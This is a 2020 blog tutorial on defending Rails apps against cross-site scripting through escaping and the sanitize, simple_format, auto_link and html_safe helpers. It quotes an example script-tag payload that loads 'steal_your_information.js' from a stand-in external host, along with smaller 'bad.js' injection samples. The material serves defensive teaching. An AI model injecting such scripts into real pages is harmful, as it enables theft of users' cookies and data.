Handling Bad User Content

Aug 2020

Rails Helpers that Help

When we build web applications, we’re happy when people use them.

Well, most of the time. The trouble is, some people misuse them. And robots, they always misuse them.

So we have to prepare for people and robots trying to break our nice things.

What could a bad actor do?

When we’re talking about a fairly standard web application, a user is presented with a form to tweet in, post in, comment in, whatever in.

When I type into the tweet form on twitter.com:

My browser sends this text to Twitter’s database.

Then when you open twitter.com, your browser requests information from Twitter’s database, including my tweet text, to display.

Everything seems okay!

HTML

But what if, instead of typing

Here is something to be outraged about

I type

<h1>Here is something to be outraged about</h1>

If Twitter just displayed what I typed, your browser would interpret it as HTML, and render it as such.

Now attemping to inject an <h1> is only a troll-level attempt at acting poorly. Let’s continue on to a more worthy adversary.

XSS

I could tweet

<script src=”https://mysite.com/steal_your_information.js” > </script>

When your browser interprets this as HTML, it will actually load steal_your_information.js from mysite.com.

Now you are pwned.

Your browser is running my Javascript (XSS stands for Cross Site Scripting), so I can choose to steal your information (cookies, forms, etc), or add things to your DOM and request that you give me new information.

Escaping

One preventative measure is to just render everything as text. In order to do this, we need to escape characters that look like HTML. So if you tweet

<script src=”https://mysite.com/steal_your_information.js” > </script>

Then that’s exactly what your followers will see.

No script is loaded, we just look at the HTML like it’s a painting.

The behind-the-scenes escaped version of that chunk of text looks like:

&lt;script src=“https://mysite.com/steal_your_information.js” &gt; &lt;/script&gt;

Instead of < we see something like <, which is an HTML Character Entity. I’ve rambled about HTML entities elsewhere on the blog if you’re curious.

If the characters weren’t escaped, the tweet would render as HTML, and nothing would be visible, because <script> tags are hidden in rendered HTML. But the JS would be running in the background 🙃.

Sanitizing

Another option is to clean up the user input before it’s displayed, allowing some HTML, and throwing out bad stuff.

So for example, if I tweet

Here’s a link to my <a href=”https://mysite.com” >my website</a>

We wan’t it to look like:

rather than:

How to accomplish this stuff in Rails

Rails has a few built-in helpers that can get us on our way.

1. Do Nothing

Rails automatically escapes HTML in user generated content when it’s displayed in views!

If we need to be explicit, we can use the html_escape utility method.

This is called on a string and escapes HTML characters.

html_escape("<a>Link here</a>")

=> "&lt;a&gt;Link here&lt;/a&gt;"

2. Sanitize

As we hinted at above, Rails’ sanitize method strips away dangerous HTML like <script>, <form>, onclick, and allows safe HTML like <strong>, <a>, <img>, etc.

Let’s say our @post.body is:

Here's a <a href="http://google.com">link</a>.
<script src="bad.js"></script>
<img src="image.jpg" />

When we run sanitize(@post.body) in our view,

We see this on our webpage:

and the DOM looks like this:

So the good HTML renders as HTML, and allows us to input links and images.

The bad HTML is completely deleted before it even makes its way to the DOM.

Seems like a nice compromise if we want to allow our users to have some control. The sanitize method allows customization, so we can specify if we want to allow or disallow certain HTML tags.

3. Simple_format

Rails’ simple_format(text) first santizes the text, and then respects the newlines of the text input.

This is most common in the case of a textarea — a user might have newlines between text.

For a single newline, simple_format will add a <br> tag.

For multiple newlines, the surrounding text will be wrapped in <p> tags.

4. Auto_link

Auto_link used to be part of Rails core, but has since been moved to an external Gem.

It hasn’t been updated since 2016, but still seems to work well in 2020.

This is useful when users will enter links, without marking them up with HTML. Let’s say you build a chat application, and a user types:

Hey did you see www.thiswebsite.com

As it stands, that link won’t be clickable when it renders in HTML, because no one told Rails that it’s a link. Having to copy and paste links is not fun in a web app, so auto_link will parse the text, and add <a> tags where necessary.

But before doing that, it will sanitize the text, just as we saw above.

Let’s say @post.body is: Hey did you see www.thiswebsite.com. <script src="bad.js"></script>

auto_link(@post.body)

=> "Hey did you see <a href='http://www.thiswebsite.com'>www.thiswebsite.com</a>."

So, the non-link turned into a link, and the built-in sanitize removed the <script>.

And we can even combine this with simple_format if we’re working with textareas.

5. HTML_Safe or Raw

As we mentioned above, Rails automatically escapes all text before rendering in views. However, if we’re really careful, and want to override this behavior, we can run html_safe or raw

html_safe is called on a string — "my string".html_safe

raw takes string parameters — raw("my string")

Both methods render the HTML exactly as it came in from the user. If it isn’t already clear — this is dangerous! So, you should only use this if you have a clear idea of what strings are being used (likely not user input).

The main difference between the two is that html_safe will crash your app if your string is nil with a undefined method 'html_safe' for nil:NilClass — so be careful there!

Conclusion

This post has concluded.